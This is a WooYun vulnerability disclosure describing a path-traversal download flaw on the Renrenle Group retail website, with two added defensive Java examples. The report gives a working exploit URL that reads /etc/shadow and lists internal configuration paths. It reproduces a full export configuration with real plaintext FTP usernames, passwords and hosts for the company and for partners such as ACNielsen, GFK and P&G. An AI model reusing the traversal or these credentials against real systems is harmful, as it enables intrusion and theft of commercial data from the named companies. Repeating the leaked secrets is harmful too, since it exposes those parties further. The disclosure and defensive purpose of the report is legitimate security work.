
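Vulnerability summary

Bug ID: wooyun-2015-0139992

Title: Arbitrary file download vulnerability on the Renrenle Group official website exposes product information for all of its stores (shadow readable)

Vendor: Renrenle Group (人人乐集团)

Author: Coderss

Submitted: 2015-09-09 17:32

Fixed: 2015-10-24 17:34

Published: 2015-10-24 17:34

Vulnerability type: arbitrary file traversal/download

Severity: Medium

Self-assessed rank: 5

Vulnerability status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org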



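Vulnerability details

Disclosure status:

2015-09-09: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2015-10-24: The vendor has actively ignored the vulnerability; details released to the public

Brief description:

Renrenle Commercial Group Co., Ltd. (stock code 002336), formerly Shenzhen Renrenle Chain Commercial Co., Ltd., was founded in April 1996. Its main business is the chain operation of hypermarkets, general supermarkets and department stores.

Detailed description:

Vulnerable link:
http://www.renrenle.cn/share/download.jsp?filePath=admin/upload/1342576091234.doc&fileName=1342576091234.doc
Changing the file path allows arbitrary files to be downloaded.
The system runs Linux, so the shadow file can be downloaded directly:
http://www.renrenle.cn/share/download.jsp?filePath=../../../../../../../../../../../etc/shadow&fileName=shadow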

The shadow file can be read directly, so the web service is running with fairly high privileges.
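
The server-side check that would stop the filePath traversal above, as an added example (not the site's code, which is not shown on this page). The class name, the temporary download root and the sample file are assumptions constructed for the demonstration.

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;
import java.nio.file.Paths;

/** Hypothetical helper: maps a user-supplied filePath to a file inside one fixed directory. */
public class SafeDownloadResolver {

    private final Path baseDir;

    public SafeDownloadResolver(Path baseDir) throws IOException {
        // Canonicalise the base once, so every later comparison is against its real location.
        this.baseDir = baseDir.toRealPath();
    }

    /** Returns the real path that may be served, or throws if the request leaves baseDir. */
    public Path resolve(String filePath) throws IOException {
        if (filePath == null || filePath.isEmpty()) {
            throw new SecurityException("empty filePath");
        }
        final Path requested;
        try {
            requested = Paths.get(filePath);          // rejects NUL bytes and malformed names
        } catch (InvalidPathException e) {
            throw new SecurityException("malformed filePath");
        }
        if (requested.isAbsolute()) {
            throw new SecurityException("absolute path rejected");
        }
        // Collapse "." and ".." lexically, then require the result to stay under baseDir.
        Path candidate = baseDir.resolve(requested).normalize();
        if (!candidate.startsWith(baseDir)) {
            throw new SecurityException("path escapes download directory");
        }
        // Resolve symlinks as well: a link inside baseDir must not point outside it.
        Path real = candidate.toRealPath();           // NoSuchFileException if the file is missing
        if (!real.startsWith(baseDir) || !Files.isRegularFile(real)) {
            throw new SecurityException("not a servable file");
        }
        return real;
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample tree standing in for the application's download root.
        Path root = Files.createTempDirectory("download-root");
        Path upload = Files.createDirectories(root.resolve("admin/upload"));
        Files.write(upload.resolve("1342576091234.doc"),
                "constructed sample".getBytes(StandardCharsets.UTF_8));

        SafeDownloadResolver resolver = new SafeDownloadResolver(root);
        String[] inputs = {
            "admin/upload/1342576091234.doc",                 // legitimate request from the report
            "../../../../../../../../../../../etc/shadow",    // traversal value from the report
            "admin/upload/../../../etc/shadow",               // traversal hidden behind a valid prefix
            "/etc/shadow",                                    // absolute path
            "admin/upload/missing.doc"                        // nonexistent file
        };
        for (String in : inputs) {
            try {
                Path served = resolver.resolve(in);
                System.out.println("SERVE  " + in + " -> " + resolver.baseDir.relativize(served));
            } catch (SecurityException | IOException e) {
                System.out.println("REJECT " + in + " (" + e + ")");
            }
        }
    }
}
```

Only the first input is served; the others are rejected before any file is opened. Running the application server under an unprivileged account is a separate control that keeps files such as shadow unreadable even if a check like this is missing.
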
Reading source files led to the following configuration file paths:
/opt/jboss/server/default/deploy/ws.war/WEB-INF/web.xml
/opt/jboss/server/default/deploy/ws.war/WEB-INF/conf/app-context.xml
/opt/jboss/server/default/deploy/ws.war/WEB-INF/sql.tld
/opt/jboss/server/default/deploy/mpwx.war/WEB-INF/web.xml
/opt/jboss/server/default/deploy/testws.war/WEB-INF/classes/conf/MallWSConfig.xml
/home/ftp1007/exportConfig.xml
/opt/jboss/server/default/deploy/scm.war/WEB-INF/struts-config.xml
Reading these configuration files yields a lot of sensitive information:
FTP connection details for this server:
<property name="host">127.0.0.1</property>
<property name="port">21</property>
<property name="username">ftp1003</property>
<property name="password">ac1003ln</property>
<property name="workDir">/download</property>

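The configuration file contains a large number of FTP logins, and logging in with these accounts gives access to a large amount of sales information:
Configuration file: /opt/jboss/server/default/deploy/scm.war/WEB-INF/classes/exportConfig.xml
Its contents are as follows: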



This exposes the product data and sales data of all stores under the group.
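
An audit a defender could run over deployed export configurations that use the `<company>`/`<job>`/`<property>` layout shown on this page, as an added example (not code from the site). The class name and the sample XML are constructed for illustration; passwords are never printed.

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;

/** Hypothetical audit tool: flags plaintext transfer credentials in export job configs. */
public class PlaintextCredentialAudit {

    /** Text of <property name="..."> inside the given job, or null if absent. */
    static String property(Element job, String name) {
        NodeList props = job.getElementsByTagName("property");
        for (int i = 0; i < props.getLength(); i++) {
            Element p = (Element) props.item(i);
            if (name.equals(p.getAttribute("name"))) {
                return p.getTextContent().trim();
            }
        }
        return null;
    }

    static List<String> audit(String xml) throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Parse untrusted config defensively: no DOCTYPE, so no external entities.
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        Document doc = f.newDocumentBuilder().parse(new InputSource(new StringReader(xml)));

        List<String> findings = new ArrayList<>();
        Map<String, String> firstUse = new HashMap<>();   // credential pair -> first job seen
        NodeList jobs = doc.getElementsByTagName("job");
        for (int i = 0; i < jobs.getLength(); i++) {
            Element job = (Element) jobs.item(i);
            Node parent = job.getParentNode();
            String company = parent instanceof Element
                    ? ((Element) parent).getAttribute("name") : "?";
            String user = property(job, "username");
            String pass = property(job, "password");
            if (pass == null || pass.isEmpty()) {
                continue;                                  // commented-out blocks never reach here
            }
            List<String> issues = new ArrayList<>();
            issues.add("plaintext password in deployed config");
            if (pass.equals(user)) {
                issues.add("password equals username");
            }
            String earlier = firstUse.putIfAbsent(user + "\u0000" + pass, company);
            if (earlier != null) {
                issues.add("same credential as job " + earlier);
            }
            if ("ftp".equalsIgnoreCase(property(job, "transmitProtocol"))) {
                issues.add("sent over cleartext FTP");
            }
            findings.add(company + " user=" + user + " host=" + property(job, "host")
                    + ": " + String.join("; ", issues));
        }
        return findings;
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample in the page's layout; hosts and credentials are placeholders.
        String sample =
              "<configuration><export>"
            + "<company name=\"PartnerA\"><job>"
            + "<property name=\"transmitProtocol\">ftp</property>"
            + "<property name=\"host\">192.0.2.10</property>"
            + "<property name=\"username\">partnera</property>"
            + "<property name=\"password\">partnera</property>"
            + "</job></company>"
            + "<company name=\"PartnerB\"><job>"
            + "<property name=\"transmitProtocol\">ftp</property>"
            + "<!-- <property name=\"password\">old-placeholder</property> -->"
            + "<property name=\"host\">192.0.2.20</property>"
            + "<property name=\"username\">shared_user</property>"
            + "<property name=\"password\">placeholder-secret</property>"
            + "</job></company>"
            + "<company name=\"PartnerC\"><job>"
            + "<property name=\"transmitProtocol\">ftp</property>"
            + "<property name=\"host\">192.0.2.20</property>"
            + "<property name=\"username\">shared_user</property>"
            + "<property name=\"password\">placeholder-secret</property>"
            + "</job></company>"
            + "</export></configuration>";
        for (String finding : audit(sample)) {
            System.out.println(finding);
        }
    }
}
```
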


Proof of vulnerability:

Vulnerable link:
http://www.renrenle.cn/share/download.jsp?filePath=admin/upload/1342576091234.doc&fileName=1342576091234.doc
Changing the file path allows arbitrary files to be downloaded.
The system runs Linux, so the shadow file can be downloaded directly:
http://www.renrenle.cn/share/download.jsp?filePath=../../../../../../../../../../../etc/shadow&fileName=shadow

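The shadow file can be read directly, so the web service is running with fairly high privileges.
Reading source files led to the following configuration file paths: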
/opt/jboss/server/default/deploy/ws.war/WEB-INF/web.xml
/opt/jboss/server/default/deploy/ws.war/WEB-INF/conf/app-context.xml
/opt/jboss/server/default/deploy/ws.war/WEB-INF/sql.tld
/opt/jboss/server/default/deploy/mpwx.war/WEB-INF/web.xml
/opt/jboss/server/default/deploy/testws.war/WEB-INF/classes/conf/MallWSConfig.xml
/home/ftp1007/exportConfig.xml
/opt/jboss/server/default/deploy/scm.war/WEB-INF/struts-config.xml
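Reading these configuration files yields the FTP usernames and passwords that the group's stores use to upload product information:
FTP connection details for this server: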
<property name="host">127.0.0.1</property>
<property name="port">21</property>
<property name="username">ftp1003</property>
<property name="password">ac1003ln</property>
<property name="workDir">/download</property>

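The configuration file contains a large number of FTP logins. Each account corresponds to a different store's information, and logging in with these accounts gives access to a large amount of sales information:
Configuration file: /opt/jboss/server/default/deploy/scm.war/WEB-INF/classes/exportConfig.xml
Its contents are as follows: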

<configuration> 
<export>
<!-- AC尼尔森 -->
<company name="ACNielsen">
<job>
<property name="sql"><![CDATA[select a.shopID,a.vgno,trunc(b.deptid/100),b.goodsno,b.gname,b.spec,b.uname,round(sum(a.qty),2),case sum(a.qty) when 0 then 0 else round(sum(a.salevalue)/sum(a.qty),3) end,round(sum(salevalue),3) from sale a,goods b,shop c where a.vgno=b.vgno and a.shopID=c.shopID and a.flag= 0 and a.supflag=0 and substr(b.deptID,1,2) in(11,12,13,14,15,16,17,18,31,32,33,41,42,43,44,51,52,53,54,61,62,63,64,65,66,67,68) and a.sdate > ? and a.sdate <= ? group by 1,2,3,4,5,6,7]]></property>
<property name="encoding">8859_1</property>
<property name="separator">|</property>
<property name="exportHead"><![CDATA[店号|商品代码|中类代码|商品条码|商品描述|商品规格|单位|销售量|单价|销售金额]]></property>
<property name="lastExported">2014-07-20</property>
<property name="periods">7</property>
<property name="periodFlag">D</property>
<property name="transmitProtocol">ftp</property>
<property name="host">127.0.0.1</property>
<property name="port">21</property>
<property name="username">ftp1003</property>
<property name="password">ac1003ln</property>
<property name="workDir">/download</property>
</job>
</company>
<!--- 上海捷孚凯(GFK) - -->
<company name="GFK">
<job>
<property name="sql"><![CDATA[select Trim(d.shopid)||"|"||d.name HeadID,Trim(c.shopid)||"|"||c.name shopID,b.BrandName,b.DeptID||"|"||p.Name,b.vgno,b.gname,b.spec,round(sum(a.qty),2),case sum(a.qty) when 0 then 0 else round(sum(a.salevalue)/sum(a.qty),3) end from sale a,goods b,shop c,shop d,Dept p where a.vgno=b.vgno and a.shopid=c.shopid and c.headid=d.shopid and b.deptid=p.id and a.flag= 0 and a.supflag=0 and a.sdate >= ? and a.sdate < ? and substr(b.deptid,1,1)=4 and b.runtype=0 group by 1,2,3,4,5,6,7 order by 1,2]]></property>
<property name="encoding">8859_1</property>
<property name="separator">|</property>
<property name="exportHead"><![CDATA[城市编号|城市|商店编号|商店名称|品牌编号|品牌|类别编号|类别名称|商品编码|商品名称|型号|销量|价格]]></property>
<property name="lastExported">2008-06-01</property>
<property name="periods">1</property>
<property name="periodFlag">M</property>
<property name="transmitProtocol">ftp</property>
<property name="host">172.25.100.18</property>
<property name="port">21</property>
<property name="username">ftp1004</property>
<property name="password">sh1004gfk</property>
<property name="workDir">/download</property>
</job>
</company>
<!-- -北京中怡康- -->
<company name="ZYK">
<job>
<property name="sql"><![CDATA[select Trim(d.shopid)||"|"||d.name HeadID,Trim(c.shopid)||"|"||c.name shopID,b.BrandName,b.DeptID||"|"||p.Name,b.spec,round(sum(a.qty),2),round(sum(salevalue),3) from sale a,goods b,shop c,shop d,Dept p where a.vgno=b.vgno and a.shopid=c.shopid and c.headid=d.shopid and b.deptid=p.id and a.flag= 0 and a.supflag=0 and a.sdate >= ? and a.sdate < ? and substr(b.deptid,1,1)=4 and b.runtype=0 group by 1,2,3,4,5 order by 1,2]]></property>
<property name="encoding">8859_1</property>
<property name="separator">|</property>
<property name="exportHead"><![CDATA[城市编号|城市|门店编号|门店名称|品牌编号|品牌|类别编号|类别名称|型号|零售量|零售额]]></property>
<property name="lastExported">2014-06-01</property>
<property name="periods">1</property>
<property name="periodFlag">M</property>
<property name="transmitProtocol">ftp</property>
<property name="host">127.0.0.1</property>
<property name="port">21</property>
<property name="username">ftp1005</property>
<property name="password">bj1005zyk</property>
<property name="workDir">/download</property>
</job>
</company>
<!-- -宝洁- -->
<company name="PG">
<job>
<property name="sql"><![CDATA[select a.SheetID,c.customno,b.qty,b.cost,'' actualQty,a.shopid,b.goodsno,a.note,a.editdate,a.deliverdate,a.purday,f.name shopName,a.purchaseshopid,g.name purchaseshopName,a.supplyid,d.name supplyName,a.paytypename,a.ManageDeptName,b.vgno,b.gname,b.spec,b.PKNum,b.uname,case when b.PKNum=0 then b.qty else round(b.qty/b.PKNum,2) end PKNums from OrderModu a,OrderItem b,Goods c,Supply d,outer Shop f,outer shop g where a.SheetID=b.SheetID and b.vgno=c.Vgno and a.SupplyID=d.supplyid and a.supplyid in(10805,10806,10860,13093,14184,16629,2536,2539,2957,3784,3785,9284,9334) and a.editDate > ? and a.editDate<=? and substr(a.SheetID,1,4) in('A001','G001') and a.shopid=f.shopid and a.purchaseshopid=g.shopid and a.shopid='L001' order by a.sheetid]]></property>
<!--
<property name="sql"><![CDATA[select a.SheetID from OrderModu a where a.supplyid in(10805,10806,10860,13093,14184,16629,2536,2539,2957,3784,3785,9284,9334) and a.editDate > ? and a.editDate<=? and substr(a.SheetID,1,4) in('A001','G001') and a.shopid=a.purchaseshopid and a.shopid='L001' order by a.sheetid]]></property>
-->
<property name="encoding">8859_1</property>
<property name="separator">,</property>
<property name="exportHead"><![CDATA[订单号,客户商品编码,订货数量,进价,实际送货数,送货店号,条码,备注,订货日期,要求送货日,有效天数,送货店名,订货店号,订货店名,供应商编号,供应商名称,结算方式,管理课,商品编码,商品名,商品规格,包装规格,订货单位,件数]]></property>
<property name="lastExported">2009-02-19</property>
<property name="periods">0</property>
<property name="periodFlag">N</property>
<property name="transmitProtocol">ftp</property>
<property name="host">127.0.0.1</property>
<property name="port">21</property>
<property name="username">ftp1006</property>
<property name="password">gz1006pg</property>
<property name="workDir">/download</property>
</job>
</company>
<!-- -EDI订单(PG)- -->
<company name="EDI">
<job>
<property name="sql"><![CDATA[select distinct a.refsheetid from ordermodu a where a.SupplyID in(select supplyid from supplyedi where edino=1) and a.EDIFlag=1 and a.EDIStatus=1 and a.EditDate>=today-30 and a.ActiveFlag in(0,3) order by a.refsheetid]]></property>
<property name="beforeExport"><![CDATA[update ordermodu set EDIStatus=1 where SupplyID in(select supplyid from supplyedi where edino=1) and EDIFlag=1 and EDIStatus=0 and EditDate>=today-30 and ActiveFlag in(0,3) and (EDISendTime is null or EDISendTime<=current)]]></property>
<property name="afterExport"><![CDATA[update ordermodu set EDIStatus=2 where SupplyID in(select supplyid from supplyedi where edino=1) and EDIFlag=1 and EDIStatus=1 and EditDate>=today-30 and ActiveFlag in(0,3)]]></property>
<property name="exportUrl"><![CDATA[http://127.0.0.1/scm/order/ediOrderAction.do?method=printEDIOrder&shopID=RRL001]]></property>
<property name="encoding">8859_1</property>
<property name="separator">|</property>
<property name="lastExported">2014-07-27</property>
<property name="periods">0</property>
<property name="periodFlag">N</property>
<property name="transmitProtocol">ftp</property>
<!--
<property name="transmitMode">1</property>
<property name="host">172.25.0.18</property>
<property name="port">21</property>
<property name="username">ftp1006</property>
<property name="password">gz1006pg</property>
<property name="workDir">/Backup</property>
-->
<property name="localWorkDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/edi/</property>
<property name="localBackupDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/edi/backup/</property>
<property name="checkFilter">.txt</property>
<!-- -传输模式 1=主动 0=被动 默认为主动模式- -->
<property name="transmitMode">0</property>
<property name="host">pngftp.myb2bi.com</property>
<property name="port">9090</property>
<property name="username">renrenle</property>
<property name="password">renrenle</property>
</job>
</company>
<!-- -EDI订单(徐福记)- -->
<company name="EDIXJ">
<job>
<property name="sql"><![CDATA[select distinct a.refsheetid from ordermodu a where a.SupplyID in(select supplyid from supplyedi where edino=2) and a.EDIFlag=1 and a.EDIStatus=1 and a.EditDate>=today-30 and a.ActiveFlag in(0,3) order by a.refsheetid]]></property>
<property name="beforeExport"><![CDATA[update ordermodu set EDIStatus=1 where SupplyID in(select supplyid from supplyedi where edino=2) and EDIFlag=1 and EDIStatus=0 and EditDate>=today-30 and ActiveFlag in(0,3) and (EDISendTime is null or EDISendTime<=current)]]></property>
<property name="afterExport"><![CDATA[update ordermodu set EDIStatus=2 where SupplyID in(select supplyid from supplyedi where edino=2) and EDIFlag=1 and EDIStatus=1 and EditDate>=today-30 and ActiveFlag in(0,3)]]></property>
<property name="exportUrl"><![CDATA[http://127.0.0.1/scm/order/ediOrderAction.do?method=printEDIOrder&shopID=RRL001]]></property>
<property name="encoding">8859_1</property>
<property name="separator">|</property>
<property name="lastExported">2014-07-27</property>
<property name="periods">0</property>
<property name="periodFlag">N</property>
<property name="transmitProtocol">ftp</property>
<property name="localWorkDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/edixj/</property>
<property name="localBackupDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/edixj/backup/</property>
<property name="checkFilter">.txt</property>
<!-- -传输模式 1=主动 0=被动 默认为主动模式- -->
<property name="transmitMode">0</property>
<property name="host">119.147.24.89</property>
<property name="port">15923</property>
<property name="username">edi_rrl</property>
<property name="password">Edi_Rrl_2013</property>
</job>
</company>
<!-- -EDI(宝洁单品每日事实数据)- -->
<company name="BJDaySale">
<job>
<property name="sql"><![CDATA[select goodsno,vgno,shopid,sdate,planid,promid,wholeflag,truesalevalue,gcostnotax,ordervalue,stockvalue,qty,notaxcostvalue,stockqty,automakeupid,notaxpkcost from bjdaysale where EDIStatus=1 and sdate=today-1 and areaid=?]]></property>
<property name="beforeExport"><![CDATA[update bjdaysale set EDIStatus=1 where EDIStatus=0 and sdate=today-1]]></property>
<property name="afterExport"><![CDATA[update bjdaysale set EDIStatus=2 where EDIStatus=1 and sdate=today-1]]></property>
<property name="encoding">8859_1</property>
<property name="separator">|</property>
<property name="exportHeader"><![CDATA[国际条形码|客户码|门店/大仓代码|日期|邮报编号(档期+区域)|促销类型|批发标志|当日销售金额(未税)|当日销售前台利润(未税)|当日进货金额(未税)|当日库存金额(未税)|销售数量|进货数量|库存数量|产品状态|当日系统进价(未税)]]></property>
<property name="lastExported">2014-07-27</property>
<property name="periods">0</property>
<property name="periodFlag">N</property>
<property name="transmitProtocol">ftp</property>
<property name="localWorkDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/bjdaysale/</property>
<property name="localBackupDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/bjdaysale/backup/</property>
<property name="checkFilter">.txt</property>
<!-- -Transfer mode: 1=active, 0=passive; defaults to active mode- -->
<property name="transmitMode">0</property>
<property name="host">119.147.24.89</property>
<property name="port">15923</property>
<property name="username">rrl_pos</property>
<property name="password">rrl_pos_20130806</property>
<property name="FileNameHead">RENRENLEBJ</property>
<property name="FileNameType">PGPOS</property>
<property name="FileNamelast">Original.txt</property>
<property name="FileNameSplit">-</property>
</job>
</company>
<!-- -EDI (P&G category fact data)- -->
<company name="BJDeptSale">
<job>
<property name="sql"><![CDATA[select supplyid,deptid,z_deptid,d_deptid,shopid,sdate,planid,wholeflag,truesalevalue from bjdeptsale where EDIStatus=1 and sdate=today-1 and areaid=?]]></property>
<property name="beforeExport"><![CDATA[update bjdeptsale set EDIStatus=1 where EDIStatus=0 and sdate=today-1]]></property>
<property name="afterExport"><![CDATA[update bjdeptsale set EDIStatus=2 where EDIStatus=1 and sdate=today-1]]></property>
<property name="encoding">8859_1</property>
<property name="separator">|</property>
<property name="exportHeader"><![CDATA[供应商|客户小类代码|客户中类代码|客户大类代码|门店代码|客户时间(天/客户周)|邮报编号|批发标志|销售额(未税)]]></property>
<property name="lastExported">2014-07-17</property>
<property name="periods">0</property>
<property name="periodFlag">N</property>
<property name="transmitProtocol">ftp</property>
<property name="localWorkDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/bjdeptsale/</property>
<property name="localBackupDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/bjdeptsale/backup/</property>
<property name="checkFilter">.txt</property>
<!-- -Transfer mode: 1=active, 0=passive; defaults to active mode- -->
<property name="transmitMode">0</property>
<property name="host">119.147.24.89</property>
<property name="port">15923</property>
<property name="username">rrl_pos</property>
<property name="password">rrl_pos_20130806</property>
<property name="FileNameHead">RENRENLEBJ</property>
<property name="FileNameType">PGCategory</property>
<property name="FileNamelast">Original.txt</property>
<property name="FileNameSplit">-</property>
</job>
</company>
<!-- -EDI (P&G product master data)- -->
<company name="BJGoods">
<job>
<property name="sql"><![CDATA[select goodsno,vgno,gname,pknum,whl,keepdays,d_deptid,d_deptname,z_deptid,z_deptname,x_deptid,x_deptname from bjgoods where EDIStatus=1 and sdate=today-1 and areaid=?]]></property>
<property name="beforeExport"><![CDATA[update bjgoods set EDIStatus=1 where EDIStatus=0 and sdate=today-1]]></property>
<property name="afterExport"><![CDATA[update bjgoods set EDIStatus=2 where EDIStatus=1 and sdate=today-1]]></property>
<property name="backExport"><![CDATA[update bjgoods set EDIStatus=0 where EDIStatus=2 and sdate=today-1]]></property>
<property name="encoding">8859_1</property>
<property name="separator">|</property>
<property name="exportHeader"><![CDATA[国际条形码|客户码|产品名称|产品规格|外箱尺寸|产品有效期|客户大类代码|客户大类描述|客户中类代码|客户中类代码描述|客户小类代码|客户小类描述]]></property>
<property name="lastExported">2014-05-26</property>
<property name="periods">0</property>
<property name="periodFlag">N</property>
<property name="transmitProtocol">ftp</property>
<property name="localWorkDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/bjgoods/</property>
<property name="localBackupDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/bjgoods/backup/</property>
<property name="checkFilter">.txt</property>
<!-- -Transfer mode: 1=active, 0=passive; defaults to active mode- -->
<property name="transmitMode">0</property>
<property name="host">119.147.24.89</property>
<property name="port">15923</property>
<property name="username">rrl_pos</property>
<property name="password">rrl_pos_20130806</property>
<property name="FileNameHead">RENRENLEBJ</property>
<property name="FileNameType">PGArticles</property>
<property name="FileNamelast">Original.txt</property>
<property name="FileNameSplit">-</property>
</job>
</company>
<!-- -EDI (BJ store data)- -->
<company name="BJShop">
<job>
<property name="sql"><![CDATA[select unique id,rationshopid,name,headid,headname,sdate,closeflag from bjshop where EDIStatus=1 and loadsdate=today-1 order by id]]></property>
<property name="beforeExport"><![CDATA[update bjshop set EDIStatus=1 where EDIStatus=0 and loadsdate=today-1]]></property>
<property name="afterExport"><![CDATA[update bjshop set EDIStatus=2 where EDIStatus=1 and loadsdate=today-1]]></property>
<property name="encoding">8859_1</property>
<property name="separator">|</property>
<property name="exportHeader"><![CDATA[门店/大仓代码|门店对应大仓代码|门店/大仓名称|门店区域代码|门店区域描述|开店时间|门店状态]]></property>
<property name="lastExported">2014-05-21</property>
<property name="periods">0</property>
<property name="periodFlag">N</property>
<property name="transmitProtocol">ftp</property>
<property name="localWorkDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/bjshop/</property>
<property name="localBackupDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/bjshop/backup/</property>
<property name="checkFilter">.txt</property>
<!-- -Transfer mode: 1=active, 0=passive; defaults to active mode- -->
<property name="transmitMode">0</property>
<property name="host">119.147.24.89</property>
<property name="port">15923</property>
<property name="username">rrl_pos</property>
<property name="password">rrl_pos_20130806</property>
<property name="FileNameHead">RENRENLEBJ</property>
<property name="FileNameType">StoreArticles</property>
<property name="FileNamelast">Original.txt</property>
<property name="FileNameSplit">-</property>
</job>
</company>
<!-- -EDI (BJ promotion data)- -->
<company name="BJProm">
<job>
<property name="sql"><![CDATA[select planid,shopid,supplyid,paytypeid,vgno,goodsno,pricebegindate,priceenddate from bjprom where EDIStatus=1 and sdate=today-1]]></property>
<property name="beforeExport"><![CDATA[update bjprom set EDIStatus=1 where EDIStatus=0 and sdate=today-1]]></property>
<property name="afterExport"><![CDATA[update bjprom set EDIStatus=2 where EDIStatus=1 and sdate=today-1]]></property>
<property name="encoding">8859_1</property>
<property name="separator">|</property>
<property name="exportHeader"><![CDATA[邮报编号|门店代码|供应商|结算方式|客户码|国际条形码|邮报开始日期|邮报结束日期]]></property>
<property name="lastExported">2014-05-25</property>
<property name="periods">0</property>
<property name="periodFlag">N</property>
<property name="transmitProtocol">ftp</property>
<property name="localWorkDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/bjprom/</property>
<property name="localBackupDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/bjprom/backup/</property>
<property name="checkFilter">.txt</property>
<!-- -Transfer mode: 1=active, 0=passive; defaults to active mode- -->
<property name="transmitMode">0</property>
<property name="host">119.147.24.89</property>
<property name="port">15923</property>
<property name="username">rrl_pos</property>
<property name="password">rrl_pos_20130806</property>
<property name="FileNameHead">RENRENLEBJ</property>
<property name="FileNameType">PGPromPlan</property>
<property name="FileNamelast">Original.txt</property>
<property name="FileNameSplit">-</property>
</job>
</company>
<!-- -EDI (P&G product purchase-price data)- -->
<company name="BJGoodsCost">
<job>
<property name="sql"><![CDATA[select goodsno,vgno,gname,pknum,clearflag,cost,keepdays from bjgoodscost where EDIStatus=1 and sdate=today-1 and areaid=?]]></property>
<property name="beforeExport"><![CDATA[update bjgoodscost set EDIStatus=1 where EDIStatus=0 and sdate=today-1]]></property>
<property name="afterExport"><![CDATA[update bjgoodscost set EDIStatus=2 where EDIStatus=1 and sdate=today-1]]></property>
<property name="encoding">8859_1</property>
<property name="separator">|</property>
<property name="exportHeader">05/25/2014</property>
<property name="exportFooter">@UNZ-END</property>
<property name="lastExported">2014-05-25</property>
<property name="periods">0</property>
<property name="periodFlag">N</property>
<property name="transmitProtocol">ftp</property>
<property name="localWorkDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/download/</property>
<property name="localBackupDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/download/backup/</property>
<property name="checkFilter">.txt</property>
<property name="transmitMode">0</property>
<property name="host">127.0.0.1</property>
<property name="port">21</property>
<property name="username">ftp1007</property>
<property name="password">pg1007$2014</property>
<property name="workDir">/download</property>
<property name="FileNameHead">RENRENLEBJ</property>
<property name="FileNamelast">supplygoods.txt</property>
<property name="FileNameSplit">-</property>
</job>
</company>
</export>
</configuration>


This leaks the product data and sales data of every mall under the group.

[Screenshots: 3.png, 4.png]


Fix:

Filter the input in the application logic.
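One way to implement such a filter for the `filePath` parameter, shown as an added example (this is not the site's own code): the class `SafeDownload`, the method `resolve` and the temporary download root are hypothetical, and the sample inputs are the `filePath` values from this report plus two constructed variants. The path is resolved against a fixed root, normalized, and rejected unless the real target is a regular file under that root.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;

public class SafeDownload {
    // Return the real path for a user-supplied filePath only if it is a regular file under root.
    static Path resolve(Path root, String filePath) throws IOException {
        if (filePath == null || filePath.isEmpty() || filePath.indexOf('\0') >= 0) {
            throw new SecurityException("empty or malformed filePath");
        }
        Path realRoot = root.toRealPath();
        Path candidate;
        try {
            candidate = realRoot.resolve(filePath).normalize();
        } catch (InvalidPathException e) {
            throw new SecurityException("malformed filePath");
        }
        // Lexical check: "../" sequences and absolute paths end up outside the root.
        if (!candidate.startsWith(realRoot)) {
            throw new SecurityException("filePath escapes download root");
        }
        // Symlink check: toRealPath() follows links (and throws if the file is missing).
        Path real = candidate.toRealPath();
        if (!real.startsWith(realRoot) || !Files.isRegularFile(real)) {
            throw new SecurityException("not a regular file under download root");
        }
        return real;
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample tree standing in for the upload directory.
        Path root = Files.createTempDirectory("download-root");
        Files.createDirectories(root.resolve("admin/upload"));
        Files.write(root.resolve("admin/upload/1342576091234.doc"), new byte[]{1});
        String[] inputs = {
            "admin/upload/1342576091234.doc",               // legitimate request from the report
            "../../../../../../../../../../../etc/shadow",  // traversal value from the report
            "/etc/shadow",                                  // constructed: absolute path
            "admin/upload/../../../etc/shadow"              // constructed: traversal after a valid prefix
        };
        for (String in : inputs) {
            try {
                System.out.println("ALLOW " + in + " -> " + resolve(root, in));
            } catch (SecurityException | IOException e) {
                System.out.println("DENY  " + in + " (" + e.getMessage() + ")");
            }
        }
    }
}
```

`Path.startsWith` compares whole path components, so a sibling directory whose name merely begins with the root's name does not pass the check.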

Copyright notice: when reposting, please credit the source Coderss@WooYun


Vulnerability response

Vendor response:

Unable to contact the vendor, or the vendor actively declined

Vulnerability Rank: 8 (WooYun rating)